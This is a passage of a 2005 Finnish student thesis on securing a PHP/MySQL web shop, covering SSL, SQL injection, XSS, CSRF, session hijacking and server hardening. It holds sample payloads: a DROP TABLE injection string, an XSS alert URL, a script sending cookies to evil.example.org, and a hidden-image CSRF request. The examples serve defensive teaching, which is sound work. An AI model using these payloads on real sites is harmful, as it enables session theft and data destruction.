VERKKOKAUPAN TIETOTURVALLISUUS

Koko: px
Aloita esitys sivulta:

Download "VERKKOKAUPAN TIETOTURVALLISUUS"

Transkriptio

1 VERKKOKAUPAN TIETOTURVALLISUUS Tero Auralinna Opinnäytetyö Helsingin tekniikan alan oppilaitos AV-viestinnän osasto Audiovisuaalisen viestinnän perustutkinto Ohjaaja: Siiri Räihä Opponentti: Juri Saltbacka Kevät 2005

2 HELSINGIN TEKNIIKAN ALAN OPPILAITOS AV-viestinnän osasto Tero Auralinna TIIVISTELMÄ Audiovisuaalisen viestinnän perustutkinto Verkkokaupan tietoturvallisuus Opinnäytetyö (1) Verkkokaupassa tietoturvan merkitys korostuu, koska yrityksen koko liiketoiminta saattaa pyöriä verkossa tai olla hyvin vahvasti sidoksissa toimivaan verkkopalveluun. Tappiot voivat olla huomattavia jos palvelu joudutaan sulkemaan. Lisäksi asiakkaiden henkilö- tai luottokorttitiedot saattavat olla vaarassa. Tämän opinnäytetyön tarkoituksena oli rakentaa tietoturvallinen ja käytettävä verkkokauppa PHP:n ja MySQL-tietokannan avulla, ja selvittää erilaisia turvallisuusuhkia verkkokaupan toiminnalle ja käyttäjälle. Mahdollisia uhkia ovat muun muassa vahingollisen datan syöttäminen verkkokaupan järjestelmiin, käyttäjien liian heikot salasanat, kirjautuneen käyttäjän identiteetin varastaminen ja ohjelmistoissa ilmenevät haavoittuvuudet. Näitä uhkia voidaan välttää ja niiden vaikutuksia minimoida luotettavilla ja oikein säädetyillä, ajantasaisilla ohjelmistoilla, käyttäjän ja palvelimen välisen tiedonsiirron salaamisella sekä syötteiden huolellisella tarkistamisella. Tekemässäni verkkokaupassa kaikki yleisimmät tietoturvauhkat on torjuttu, käyttäjäystävällisyyden siitä kuitenkaan kärsimättä. ABSTRACT In electronic business information security is highlighted because company s entire business might run only on Internet or at least be very covenant with Internet. Defeats could be very huge if the whole network service must run down. Customer personal details or credit card information might be in danger also. The purpose of this diploma work was to build secure and usable e-shop with PHP and MySQLdatabase. Another interest was to survey security threats for e-shop and customers. Among other things injecting harmful data to e-shop, weak passwords, stealing identity of logged in customer and vulnerabilities of software are possible security threats. These threats can be avoided with up-to-date software which is reliable and rightly configured, secured connection between client and server and carefully checked user inputs. In my e-shop all security threats are blocked without losing any usability. verkkokauppa, tietoturva, PHP, MySQL, tietoturvallinen ohjelmointi

3 SISÄLLYSLUETTELO 1 JOHDANTO 1 2 VERKKOKAUPASTA JA TIETOTURVASTA 1 3 SSL-SALATTU YHTEYS 4 4 HYÖKKÄYSMETODIT SQL-injection Cross-Site Scripting Cross-Site Request Forgeries Istuntoihin kohdistuvat hyökkäykset 10 5 WWW-PALVELIN Apache PHP MySQL 15 6 TURVALLINEN OHJELMOINTI Välimuisti Virheilmoitukset Salasanat Syötteiden tarkistus Sisäänkirjautuminen ja kirjautumisen tarkistus 21 7 LOPUKSI 24 LÄHTEET 26 LIITTEET

4 1 JOHDANTO Tein kevään 2005 aikana opinnäytetyöksi verkkokaupan. Koska tarkoituksenani oli oppia paremmin PHP 1 -ohjelmointia ja MySQL-tietokannan käyttöä, oli verkkokauppa monipuolisine toimintoineen täydellinen valinta opinnäytetyön aiheeksi. Lisäksi halusin perehtyä verkkokauppoihin yleisesti, niiden käytettävyyteen ja erityisesti tietoturvaan. Tavoitteenani oli tehdä tietoturvallinen ja tulevaisuudessa helposti laajennettava verkkokaupan runko. Havainnollistaakseni paremmin verkkokaupan toimintaa tein sen kuvitteelliselle digitaaliseen kuvaukseen erikoistuneelle liikkeelle (ks. liite 1). Yksi tavoitteistani oli, että verkkokauppa on helposti muunnettavissa erilaisten tuotteiden tarpeisiin. Kirjallisessa osassa olen perehtynyt lähinnä verkkokaupan tietoturvallisuuteen vaikuttaviin asioihin LAMP 2 -ympäristössä. Käsittelen palvelimen asetuksia, salatun yhteyden käyttämistä sekä turvallista PHP-ohjelmointia. Kerron myös lyhyesti yleisimmistä verkkopalveluun liittyvistä murtautumis- ja hyökkäysmenetelmistä sekä niiltä suojautumisesta. 2 VERKKOKAUPASTA JA TIETOTURVASTA Verkkokaupasta on tullut tärkeä osa yritysten sähköisen kaupankäynnin strategiaa. Perinteiseen kaupankäyntiin verrattuna verkkokaupankäynnillä on monia etuja, niin asiakkaille kuin yrityksellekin. Asiakkaan kannalta etuja ovat aukioloaika 24 tuntia vuorokaudessa, helpottunut hinta- ja tuotevertailu sekä ostosten tekemisen helppous. Kauppa on vain muutaman hiiren klikkauksen päässä, vaikka sen fyysinen sijainti olisikin maapallon toisella puolella. Lisäksi tilauksen käsittelyvaihetta voidaan usein seurata yrityksen verkkosivuilta. 1 PHP on C-kielen kaltainen, palvelinpuolen skriptikieli. PHP:tä käytetään dynaamisten wwwsivujen tuottamiseen. 2 Linux, Apache, MySQL, PHP

5 2 Yritykselle verkkokauppa mahdollistaa pienempien varastojen ylläpidon. Tuotteita voidaan tilata sitä mukaan kun tilauksia vastaanotetaan. Henkilöstön tarve on vähäistä verkkokaupassa, jonka toiminnot on tehokkaasti liitetty logistiikkaan ja maksupalveluihin. Näin myös inhimillisten virheiden mahdollisuus vähenee. Verkossa toimivaan kauppaan voidaan liittää uusia palveluja, kuten tuotearvosteluja ja linkkejä valmistajien sivuille. Lisäksi Internet tarjoaa monipuolisia tapoja tuote-esittelyjen tekemiseen. Verkkokaupan asiakkaiden tilauksia voidaan seurata kätevästi ja heille on helppo osoittaa kohdennettua mainontaa. Lisäksi verkkokaupalla tavoitetaan uusia asiakkaita. (http://moodle.wasalab.com/file.php/2/luennot/edut.html. Luettu ) Verkkokauppa on yksinkertaisimmillaan vain tuoteluettelo ja tilauslomake, monimutkaisimmillaan se sisältää tehokkaita hakutoimintoja, ostoskorin, useita maksutapoja sekä automatisoidun ylläpidon ja integraation yrityksen muihin järjestelmiin. Yksi verkkokaupan menestymiseen vaikuttavista tekijöistä on tietoturva ja se, miten turvalliseksi ja helpoksi asiakkaat mieltävät ostokokemuksen. Internet ei valitettavasti ole turvallinen paikka. Aina löytyy joku, jota kiinnostaa yrittää saada aikaan ongelmia joko rahan ansaitsemistarkoituksessa, maineen saavuttamiseksi tai vain huvin vuoksi. Tietoturvalla tarkoitetaan tietojen, järjestelmien, palvelujen ja tietoliikenteen asianmukaista suojaamista sekä normaali- että poikkeusoloissa hallinnollisilla, teknisillä ja muilla toimenpiteillä. Tietojen luottamuksellisuutta, eheyttä ja käytettävyyttä turvataan laitteisto- ja ohjelmavikojen, luonnontapahtumien sekä tahallisten, tuottamuksellisten tai tapaturmaisien tekojen aiheuttamilta uhilta ja vahingoilta. (http://www.tietoturvapalvelu.com/tietoturva.htm. Luettu ) Tietoturva muodostuu seuraavista elementeistä: luottamuksellisuus, eheys, käytettävyys ja kiistämättömyys. Luottamuksellisuudella tarkoitetaan sitä, että tieto, järjestelmä tai toiminto on vain niiden henkilöiden tai prosessien saatavissa, joilla siihen on oikeus. Eheys tarkoittaa, että ulkopuoliset eivät

6 3 pääse muuttamaan tietoa. Eheys voi särkyä myös tahattomasti, esimerkiksi tiedonsiirtoprosessin virheen takia. Käytettävyydellä ymmärretään, että tiedot ovat aina käytettävissä tai saatavilla kun niihin oikeutettu taho niitä tarvitsee. Kiistämättömyys tarkoittaa, ettei kukaan tiedonsiirto- tai tietojenkäsittelytapahtuman osapuoli pysty kiistämään osallisuuttaan kyseiseen tapahtumaan. Tarve kiistämättömyydelle tulee esiin varsinkin sähköisessä kaupankäynnissä, jossa ostotapahtuman vaiheet on pystyttävä kiistattomasti todistamaan. Tietoturvan merkitys korostuu koko ajan, kun yhä useammat palvelut siirtyvät Internetiin. (http://www.tietoturvapalvelu.com/tietoturva.htm. Luettu Luettu ) Verkkopalvelussa korkea tietoturva saavutetaan oikein asennetulla ja säädetyllä palvelimella, luotettavilla ja ajantasaisilla ohjelmistoilla, asiakkaan ja palvelimen välisen tiedonsiirron salaamisella sekä asiansa osaavalla ylläpidolla. Osa tietoturvasta kuuluu myös asiakkaille, joiden on säilytettävä tunnuksensa niin, etteivät ne päädy ulkopuolisten käsiin. Verkkopalvelun tietoturvaratkaisut täytyy tasapainottaa käytettävyyden kanssa. Istuntojen vanheneminen, pakottaminen monimutkaisiin salasanoihin, kulunvalvonta ynnä muu sellainen hankaloittavat palvelun käyttämistä. Kuva 1. Kuva Filmifriikin sivuilta, jossa tilaus keskeytyi virheilmoitukseen käyttöistunnon vanhenemisesta.

7 4 Ohjelmistoja suunniteltaessa turvallisuusnäkökulmat on otettava huomioon alusta asti. Käyttäjältä tulevan datan käsittely ja tarkistus on tärkein asia wwwohjelmistojen turvallisuudessa. Tulee olettaa, että kaikki data on vahingollista niin kauan, kunnes se on käsitelty ja todettu harmittomaksi. 3 SSL-SALATTU YHTEYS SSL (Secure Sockets Layer) on Netscapen kehittämä protokolla TCP/IP 3 - yhteyksien suojaamiseksi. Sen avulla voidaan tunnistaa palvelin luotettavaksi sekä salata verkon yli lähetettävä data. SSL on yleinen protokolla kaikilla wwwsivuilla, joilla liikenne on tarpeen salata. Henkilötietoja, luottokortin numeroita ja kirjautumistunnuksia sisältävä liikenne tulisi salata aina. (http://www.cc.jyu.fi/~anasimo/ssl2.htm. Luettu ) Itselläni ei ollut mahdollisuutta käyttää SSL-salausta opinnäytetyössäni palveluntarjoajastani johtuen. Kuva 2. Salatussa yhteydessä URL alkaa sijaan https (http://www.cc.jyu.fi/~anasimo/ssl2.htm. Luettu ). SSL-salattua yhteyttä tulisi käyttää vain niillä sivuilla, joilla arkaluontoisia tietoja välitetään, sillä se kuormittaa palvelinta huomattavasti enemmän kuin tavallinen yhteys. Kun palvelimella käytetään SSL-salattua yhteyttä, tarvitaan salausavain, jolla liikenne salataan. Salausavain löytyy sertifikaatista, josta löytyy myös tietoja palvelimesta sekä sertifikaatin myöntäneen tahon allekirjoitus. Allekirjoitus varmentaa, että palvelimen ylläpitäjä on varmistettu luotettavaksi. Sertifikaatteja myöntävät muun muassa Thawte, VeriSign, SecureSign ja Entrust. Sertifikaatin 3 TCP/IP (Transmission Control Protocol / Internet Protocol) on Internet-liikennöintiin käytetty usean tietoverkkoprotokollan yhdistelmä (http://fi.wikipedia.org/wiki/tcp/ip. Luettu ).

8 5 voi myös tehdä itse. Itse tehty sertifikaatti soveltuu lähinnä yritysten, koulujen tai muiden yhteisöjen sisäiseen käyttöön, esimerkiksi intranetiin. Kuva 3. Sampo-pankin SSL-sertifikaatti (https://www511.sampo.fi/a56/sampo_representation/representationapp. Luettu ). Sovelluksien ohjelmoimisen kannalta SSL ei aiheuta muutoksia. Palvelin ja selain hoitavat liikenteen salaamisen ja purkamisen, joten www-ohjelmien koodissa asiaan ei tarvitse kiinnittää huomiota. (http://www.cs.jyu.fi/~kolli/itk215/luennot/luento8/. Luettu )

9 6 4 HYÖKKÄYSMETODIT 4.1 SQL-injection SQL-injection on tekniikka, jolla yritetään ujuttaa omia SQL-lauseita 4 suoritettavaksi muun koodin ohessa. Tältä ikävältä haitalta on onneksi kohtalaisen helppo suojautua tarkistamalla ja suodattamalla käyttäjältä tuleva data huolellisesti. Data voi tulla evästeistä (engl. cookie), lomakkeelta tai osoiteriviltä. Alla on esimerkki, jolla pystyttäisiin pudottamaan koko käyttäjät-taulu tietokannasta. Esimerkki 1. Esimerkin ohjelma käyttää alla olevaa SQL-lausetta. SELECT * FROM kayttajat WHERE tunnus = '{$_POST['tunnus']'; Käyttäjä syöttää lomakkeen tunnuskenttään seuraavan SQL-koodin. '; DROP TABLE kayttajat; SELECT * FROM kayttajat WHERE tunnus = ' Tietokannalle menevä koodi on tällöin: SELECT * FROM kayttajat WHERE tunnus = ''; DROP TABLE kayttajat; SELECT * FROM kayttajat WHERE tunnus = ''; Komento DROP TABLE kayttajat poistaa kayttajat-nimisen taulun tietokannasta. SQL-injection tekniikan käyttämistä voidaan estää tekemällä tietokantaan käyttäjä, jonka oikeudet toimia ovat niin pienet kuin mahdollista. Sallitaan vain SELECT, UPDATE ja INSERT, jolloin esimerkiksi taulujen tuhoaminen ei ole mahdollista. Lisäksi ajetaan kaikki käyttäjältä tuleva data, 4 SQL (Structured Query Language), on standardoitu kieli relaatiotietokantojen käyttämiseen.

10 7 mysql_real_escape_string-funktion läpi, joka lisää tiettyjen vahingollisten merkkien eteen kenoviivan (esimerkiksi \ \ ). Näin niillä ei enää ole vaikutusta SQL-lauseen rakenteeseen. Vahingollisia merkkejä voidaan myös poistaa tai palauttaa virhe, jos sellaisia esiintyy. Lisäksi lomakkeiden kenttiin kannattaa asettaa rajoitus tekstin pituudelle, ja tarkistaa se vielä strlen-funktiolla, jolloin monimutkaisia ja pitkiä koodinpätkiä ei pysty järjestelmään syöttämään. Numeraaliset arvot kuten, ikä tai postinumero, kannattaa varmistaa numeroiksi is_int- tai is_numeric-funktiolla. 4.2 Cross-Site Scripting Cross-Site Scripting (XSS) -haavoittuvuudet ovat yleinen ongelma webohjelmissa. Monet avoimen lähdekoodin PHP-ohjelmistot kärsivät toistuvasti tästä ongelmasta. Muun muassa suositussa keskustelufoorumissa, phpbb:ssä on havaittu XSS-haavoittuvuuksia, jotka on mahdollista toteuttaa koodattujen 5 URL:ien 6 avulla. Toinen avoimen lähdekoodin ohjelma, josta hiljattain on löytynyt XSS-haavoittuvuus, on suosittu verkkokauppasovellus: oscommerce. extarea%3e%3cscript%3ealert('w00t');%3c/script%3e Listaus 1. Esimerkki XSS-haavoittuvuudesta oscommerce-sovelluksen yhteydenottosivulla. Enquiry-parametrin kautta järjestelmään pystyttiin syöttämään vahingollista koodia. (http://www.oscommerce.com/community/bugs,2422/. Luettu ) XSS käyttää hyväkseen käyttäjän luottamusta nettisivuihin ja niiden sisältöön. Vaikka käyttäjä ei luottaisikaan nettisivun sisältöön, saattaa selain niin tehdä, esimerkiksi lähettämällä evästeet pyynnöstä. XSS on ongelma kaikilla sivuilla, joilla sivusto ottaa vastaan käyttäjien syötteitä ja esittää sitä sivuilla. Esimerkkinä erilaiset keskustelupalstat. Jos käyttäjät pystyvät vapaasti sisällyttämään viesteihinsä HTML- ja JavaScript-koodia, on riski muille vahingollisen datan syöttämiseen ilmeinen. Yksikin HTML-tagi 5 URL koodauksella (engl. URL encoding) vaihdetaan URL:ssa olevat erikoismerkit lukuyhdistelmiin. Esimerkiksi seuraavat merkit: < >, korvataan URL:ssa merkeillä %3c ja %3e. 6 Uniform Resource Locator, käytetään osoittamaan WWW-dokumentteja.

11 8 saattaa sotkea sivun rakenteen. JavaScriptillä voidaan saada jo paljon vahingollisempia asioita aikaan. XSS-hyökkäykset voivat olla mitä vain vahingollisten skriptien ajamista, koodien sisällyttämistä, evästeiden varastamista jne. Seuraavalla esimerkillä (listaus 2) voidaan ohjata käyttäjä toiselle sivustolle ja sisällyttää kaikki dokumenttiin liittyvät evästeet URL:n cookies-parametriin. Uudelleen ohjatulla sivulla voitaisiin cookies-parametrin sisältö ottaa talteen. Jos eväste sisältäisi esimerkiksi käyttäjän istunto-id:n edelliseltä sivustolta, voitaisiin sen avulla yrittää varastaa käyttäjän identiteetti verkkopalvelussa (tästä lisää luvussa 4.4). <script> document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie </script> Listaus 2. JavaScriptillä voidaan ohjata käyttäjä uuteen osoitteeseen ja varastaa mahdolliset evästeet. (Shiflett 2004, 22.) XSS-haavoittuvuudelta voi melko helposti välttyä suodattamalla ja tarkistamalla kaikki käyttäjältä tuleva data, niin ettei mitään tageja tai skriptejä pääse datan mukana. 4.3 Cross-Site Request Forgeries Cross-Site Request Forgeries (CSRF) tyyppiset hyökkäykset käyttävät hyväkseen sivustojen luottamusta sivuston käyttäjään. Niiden tarkoituksena on saada aikaan kiellettyjä ja ei-toivottuja toimintoja sivuilla, jossa uhriksi valitulla käyttäjällä on jonkinlaisia korkeampia oikeuksia. Uhri suorittaa tietämättään hyökkääjän muodostaman HTTP-pyynnön. CSRF-hyökkäykset ovat vaikeampia toteuttaa ja huomattavasti harvinaisempia kuin esimerkiksi XSS. Niistä on myös kehittäjille vähemmän tietoa tarjolla, ja niitä vastaan on vaikeampi suojautua. (Shiflett 2004, 25.)

12 9 Seuraavaksi esimerkki (listaus 3) siitä, miten CSRF-hyökkäys voitaisiin toteuttaa. Henkilö, joka on kirjautunut sisään yrityksen nettisivujen hallinnointiin, saa sähköpostiinsa (joka renderöi HTML:n) viestin, johon on sisällytetty seuraava HTML-koodi. Koska henkilö on kirjautunut sisään ja hänellä on oikeudet poistaa tuotteita, saattaisi alla oleva koodi toimia. <img src="https://esimerkki.com/admin/tuote_id=2&poista=1&varmistus=1" height="0" width="0" /> Listaus 3. CSRF-esimerkkikoodi CSRF-hyökkäyksien mahdollisuutta voidaan yrittää estää käyttämällä lomakkeissa GET-metodin 7 sijasta POST-metodia 8 ja asettamalla PHP:n asetus register_globals pois päältä. Lisäksi erilaisten toimintojen tekeminen tarpeeksi mutkikkaiksi estää vahingollisten CSRF-hyökkäysten toimimisen. (Shiflett 2004, 29.) Käyttäjällä on suuri vastuu CSRF:n torjunnassa. Seuraavien ohjeiden noudattaminen estää selainta tekemästä harmillisia, ei-toivottuja HTTPpyyntöjä: Käytä sähköpostiohjelmaa, joka ei renderöi HTML:ää käytä uutisryhmänlukijaa, joka ei ole sidoksissa selaimeen kirjaudu ulos kaikilta sivuilta, vieraillessasi oudoilla sivuilla tai lukiessasi epäilyttäviä sähköpostiviestejä aseta salasanojen ja tunnuksien muistaminen selaimesta pois päältä älä käytä sivustojen muista kirjautuminen -ominaisuutta. (http://www.tux.org/~peterw/csrf.txt. Luettu ) 7 GET-metodilla lähetetään tiedot URL:n osana. Lähetetyt tiedot saadaan PHP:llä käyttöön $_GET[ ]-taulukosta. 8 POST-metodilla tiedot lähetetään vasta URL:n jälkeen. Tiedot saadaan PHP:llä käyttöön $_POST[ ]-taulukosta. Lomakkeissa suositellaan käytettäväksi POST-metodia.

13 Istuntoihin kohdistuvat hyökkäykset Useiden sivustojen toiminnallisuus perustuu istuntojen 9 käyttämiseen. Tämä tekee istuntokohtaisesta id-numerosta suositun kohteen hyökkäyksille. Verkkopalvelussa voidaan saada toisen henkilön identiteetti haltuun varastamalla id-numero. (Kolšek 2002, 2.) Istunnon id:tä voidaan kuljettaa joko URL:n perässä (kuva 4) tai evästeessä (kuva 5). Eväste on suosituksien mukaan tietoturvallisempi tapa, ja sitä olen itsekin käyttänyt verkkokaupassani. Tämä tosin aiheuttaa sen, että sisäänkirjautuminen ei onnistu ilman evästeitä. Kuva 4. Istunnon id-numeroa voidaan kuljettaa URL:ssa. Kuva 5. Eväste, johon on tallennettu istunnon id. 9 Istunto (engl. session) on tapa, jolla voidaan antaa jokaiselle sivustolle tulevalle käyttäjälle ainutkertainen istuntokohtainen id-numero, ja tallentaa tietoja istuntomuuttujiin. Istuntoihin talletettua dataa säilytetään palvelimella. Istunnon id-numero talletetaan joko evästeeseen tai sitä kuljetetaan URL:n mukana. (http://fi.php.net/session. Luettu )

14 11 Istuntoihin kohdistuvia hyökkäyksiä on kolmenlaisia: istunnon kaappaus (capture), arvaaminen (prediction) ja muuttaminen etukäteen (fixation). (Shiflett 2004, 39.) Istunnon id-tunnistetta on käytännössä mahdoton arvata. PHP:n natiivilla istuntomekanismilla luotu id on äärimmäisen satunnainen ja vaihtoehtoja on niin paljon, että aikaa kuluisi liian kauan id:n selvittämiseen. Esimerkki id:stä: e82559f2a6e1bb180adf185b4415b4b5. (Shiflett 2004, 39.) Helpoin tapa on tarjota käyttäjälle id valmiina, ennen kuin hän kirjautuu palveluun (Shiflett 2004, 39). Tällöin hyökkääjän ei tarvitse selvitellä id:tä, koska hän tietää sen jo. Hän voi suoraan kyseistä id:tä käyttämällä esittäytyä palvelulle kirjautuneena käyttäjänä tietämättä tämän tunnusta tai salasanaa. Jos hyökkääjän kohteena oleva palvelu hyväksyy istunnon id:n GET-parametrina, täytyy hänen saada uhri klikkaamaan linkkiä, jossa on hänen asettamansa id. Jos palvelu hyväksyy id:n vain evästeestä, on eväste saatava lähetettyä uhrille jotenkin, esimerkiksi käyttämällä mahdollista XSS-haavoittuvuutta, ja tarjoilemalla eväste JavaScriptillä. Istunnon id-numero voidaan varastaa useilla eri tekniikoilla: saastuttamalla uhrin kone sopivalla troijalaisella, XSS-haavoittuvuuden avulla tai selvittämällä id uhrin verkkoliikenteestä. Mikäli id kulkee URL:n mukana, voidaan käyttäjä ohjata toiselle sivulle ja napata viittaaja (engl. referrer) talteen. (http://www.technicalinfo.net/papers/webbasedsessionmanagement.html. Luettu ) Istuntojen kaappaamista voidaan hankaloittaa uudistamalla istunnon id onnistuneen kirjautumisen jälkeen, sekä kirjautumisen tarkistuksen yhteydessä tarkistamalla, että IP-osoite ja user-agent-määre 10 ovat samoja kuin kirjautumishetkellä. 10 User-agent on http-otsake, joka kertoo palvelimelle pyynnön lähettäneen asiakasohjelman nimen. Sisältää usein käyttöjärjestelmän ja selaimen tiedot. Esimerkiksi Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv:1.7.5) Gecko/ Firefox/1.0.

15 12 5 WWW-PALVELIN Itselläni ei juurikaan ollut mahdollisuutta vaikuttaa palvelimen asetuksiin, koska verkkokauppani on tehty daug.netin (http://www.daug.net/) palvelimelle. Tässä luvussa kerron kuitenkin lyhyesti joistakin tekemistäni huomioista, joilla wwwpalvelinta saadaan muokattua tietoturvallisemmaksi. Kaavio 1. Rakennekaavio LAMP-palvelimesta Verkkokauppa kannattaa pystyttää omalle palvelimelleen, jota ei ole jaettu muiden käyttäjien kanssa. Näin järjestelmään voidaan sallia pääsy vain luotettaville tahoille. Palomuurilla on syytä rajoittaa verkkoliikennettä niin, että vain yhteydet tarvittaviin portteihin (esimerkiksi HTTP 80, SSL 443 ja SSH 22) sallitaan. 5.1 Apache Apachea voidaan ajaa chroot-ympäristössä, eristettynä muusta tiedostojärjestelmästä, jolloin Apachen kautta tapahtuvalla murtautumisella ei päästä käsiksi muihin osiin järjestelmää.

16 13 Apachen ServerSignature asetus kannattaa asettaa pois päältä, jolloin Apachen versionumero ei näy palvelimen tekemillä sivuilla (esimerkiksi 404- virhe-sivut). Näin kukaan ei voi selvittää versionumeron perusteella, mitä mahdollisia haavoittuvuuksia palvelinohjelmisto sisältää. Muidenkin ohjelmistojen versionumeroiden näkymistä kannattaa välttää. (http://www.hudzilla.org/phpbook/read.php/17_1_5. Luettu ) 5.2 PHP Register_globals on asetus, joka kannattaa pitää pois päältä. PHP:n versiosta lähtien asetus on ollut oletuksena pois päältä. Jos register_globals on päällä, ei voida olla varma, mistä muuttujien arvot tulevat (listaus 4). PHP ei vaadi muuttujien alustamista, vaikka se suositeltavaa onkin. if (authenticated_user()) { $authorized = true; if ($authorized) { include "/highly/sensitive/data.php"; Listaus 4. Esimerkki register_globals asetuksen vaikutuksista. (http://fi.php.net/register_globals. Luettu ) Asiaton henkilö voi syöttää $authorized-muuttujan arvon URL:n parametriksi (http://www.esimerkki.com/jotain/index.php?authorized=true) ja päästä käsiksi suojatuksi tarkoitettuun dataan, mikäli käytetään yllä olevan kaltaista esimerkkiä register_globals-asetus päällä. Allow_url_fopen-asetus mahdollistaa URL:n käyttämisen esimerkiksi includefunktion kanssa. Tämä saattaa muodostaa riskin väärinkäytöksille, jos huolimattoman ohjelmoinnin tuloksena kuka tahansa pystyy syöttämään skriptille vahingollisen tiedoston osoitteen. Safe mode on PHP:n asetus, jolla on pyritty ratkaisemaan jaettuihin palvelimiin kohdistuvia ongelmia. Safe mode -asetuksen ollessa päällä PHP tarkistaa, että

17 14 ajettavan tiedoston omistaja on sama kuin niiden tiedostojen, joita yritetään suorittaa tai liittää. Safe mode -asetuksella voidaan myös poistaa käytöstä tiettyjä tiedostojen käsittelyyn liittyviä funktioita sekä asettaa tietyt hakemistot, joista tiedostojen liittäminen tai suorittaminen onnistuu. (http://fi.php.net/features.safe-mode. Luettu ) Esimerkki (listaukset 5 ja 6), jossa script.php (luotu eri tunnuksella kuin passwdtiedosto) yrittää readfile-funktiolla lukea passwd-tiedoston sisällön. (Alkuperäinen esimerkki: Luettu ) -rw-r--r-- 1 root root 1412 Feb 5 03:00 passwd -rw-r--r-- 1 lgt lgt 34 Mar 21 09:32 script.php Listaus 5. Hakemistolistaus Warning: readfile(): SAFE MODE Restriction in effect. The script whose uid is 1001 is not allowed to access /etc/passwd owned by uid 0 in /home/lgt/public_html/script.php on line 2 Listaus 6. PHP:n tuottama virheilmoitus siitä, että safe mode rajoittaa passwd-tiedoston lukemista. Kenenkään ei tarvitse tietää, että sivuston toiminnallisuudet on toteutettu PHP:llä. PHP:n asetuksista kannattaa laittaa expose_php pois päältä, jolloin PHP:n käyttöä ei voi paljastaa syöttämällä tietty parametri URL:n perään. Tiedostopääte.php voidaan vaihtaa johonkin toiseen päätteeseen. Esimerkiksi kaikki.html tiedostot voidaan asettaa ajettavaksi PHP-tulkin läpi (ks. listaus 7). AddType application/x-httpd-php.htm.html Listaus 7. Rivi Apachen httpd.conf-tiedostoon, jolla.htm- ja.html-tiedostot asetetaan ajettavaksi PHP:llä. Lisäksi voidaan käyttää Apachen Rewrite-moduulia (listaus 8). Sen monipuolisista ominaisuuksista yksi hyödyllisimmistä on URL:n siistiminen. Parametreja sisältävät URL:t voidaan naamioida näyttämään tavallisilta hakemistoilta. Tietokanta-pohjaisissa sivustoissa URL:t saattavat kasvaa järjettömän pitkiksi. Selkeät URL:t ovat osa sivuston käytettävyyttä. Lisäksi hakukoneet eivät aina ymmärrä monimutkaisia, parametreja sisältäviä

18 15 osoitteita, jolloin ne eivät kykene indeksoimaan sivun sisältöä. (http://www.pikseli.biz/blog/archive/2003/10/21/htaccess_haltuun/index.php?s= 7. Luettu ) URL normaalisti: eet&tm=canon&tuote=13 URL Rewrite-moduulilla käsittelyn jälkeen: RewriteEngine On RewriteRule ^([a-z]+)/([a-z]+)$ index.php?sivu=$1&tr=$2 RewriteRule ^([a-z]+)/([a-z]+)/$ index.php?sivu=$1&tr=$2 Listaus 8. Esimerkki rewrite-moduulin käytöstä 5.3 MySQL MySQL-tietokantaan kannattaa sallia yhteydet vain localhost 11 -osoitteesta tai sen koneen IP-osoitteesta, jossa PHP:tä ajetaan. Tietokantaan kannattaa luoda käyttäjä, jolle antaa vain tarvittavat oikeudet. Useimmissa tapauksissa SELECT, UPDATE ja INSERT riittävät. 6 TURVALLINEN OHJELMOINTI POST-metodin käyttö aina kun se on mahdollista GET-metodin sijasta, parantaa tietoturvaa, vähentämällä Cross-Site Request Forgeries -hyökkäysten mahdollisuutta (ks. luku 4.3). Lisäksi käyttämällä POST-metodia pysyy lähetettävä URL lyhyempänä, kun siihen ei tarvitse sisällyttää kaikkia lomakkeen tietoja. 11 Osoite, jolla viitataan koneeseen itseensä (sama kuin ).

19 16 Tiedostot, jotka sijaitsevat julkisessa HTML-hakemistossa, ovat kaikkien saatavilla. Tiedostot voidaan suojata Apache-ympäristössä htaccessmenetelmällä tai sijoittaa ne julkisen hakemiston ulkopuolelle, jolloin kukaan ei pääse niihin käsiksi suoraan www-selaimella. Tarvittavia tiedostoja voidaan kuitenkin käyttää include- tai require-funktioilla. MySQL-yhteyteen tarvittavat tunnukset (listaus 9) ovat hyvä esimerkki tärkeästä tiedosta, joka tulisi suojata. <?php $db = "lgt"; // Tietokannan nimi $host = "localhost:3306"; // Tietokannan osoite $user = "lgt"; // Käyttäjätunnus $passwd = "xxxxxxxxx"; // Salasana $mysql_yhteys $user, $passwd) or $mysql_yhteys) or die("tietokantavirhe");?> Listaus 9. Tiedosto, joka sisältää verkkokaupan MySQL-yhteyden tunnukset. Tiedosto sijaitsee julkisen HTML-hakemiston ulkopuolella turvassa uteliailta. Tapahtumien tallentaminen lokitiedostoihin on tärkeää mahdollisten väärinkäytösten takia. IP-osoitteen perusteella voidaan selvittää murtautujan tai väärinkäytösten suorittajan henkilöllisyys. 6.1 Välimuisti Istuntojen avulla luotuja dynaamisia sivuja, kuten käyttäjän tunnistamista, ei saisi tallentaa selaimen tai välityspalvelimen välimuistiin. Tallentaminen välimuistiin aiheuttaa tietoturvariskin, sillä vaikka käyttäjä olisikin kirjautunut oikein ulos palvelusta, päästään selaimen edellinen sivu -painikkeella katsomaan tietoja, joita käyttäjä on katsonut. Tämä tietoturva-aukko on kuitenkin helposti korjattavissa käyttämällä header-funktiota. Seuraavalla esimerkillä (listaus 10) olen estänyt verkkokaupassani selainta ja välityspalvelinta tallentamasta sivun sisältöä välimuistiin. Esimerkki toimii

20 17 useimmilla selaimilla. Se myös ohittaa kaikki käyttäjän selaimeensa tekemät asetukset. // Korjaa Explorer 6.0 selaimen bugin, joka voi ilmeta Päivitä / // Refresh-komentoa käytettäessä header("cache-control: private"); // Sivun vanhenemispäivä asetetaan menneisyyteen. Proxy "tajuaa", että // näin vanhaa sisältöä ei enää cachesta noudeta header("expires: Mon, 26 Jul :00:00 GMT"); // Sivu asetetaan aina päivitetyksi header("last-modified: ". gmdate("d, d M Y H:i:s"). " GMT"); // HTTP 1.1 protokollan mukaiset kiellot: ei varastoida välimuistiin, // vaaditaan uudelleenvalidointi sivulle tultaesssa, // vanhoilla sessio-tiedoilla ei pääse enää sivua katsomaan header("cache-control: no-store, no-cache, must-revalidate"); header("cache-control: post-check=0, pre-check=0", false); // Tämä otsikko toimii HTTP 1.0 protokollaa käytettäessä ja estää // välimuistiin tallentamisen header("pragma: no-cache"); Listaus 10. Välimuistin toiminnan ohjaaminen header-funktion avulla. (http://www.parse-error.com/display_page.php?page_id=124. Luettu ) Header-funktiot on sijoitettava sivun alkuun ennen selaimelle lähetettävää dataa. 6.2 Virheilmoitukset PHP:n antamat virheilmoitukset ovat välttämättömiä sovelluksen kehittämisvaiheessa, mutta valmis tuote ei saisi 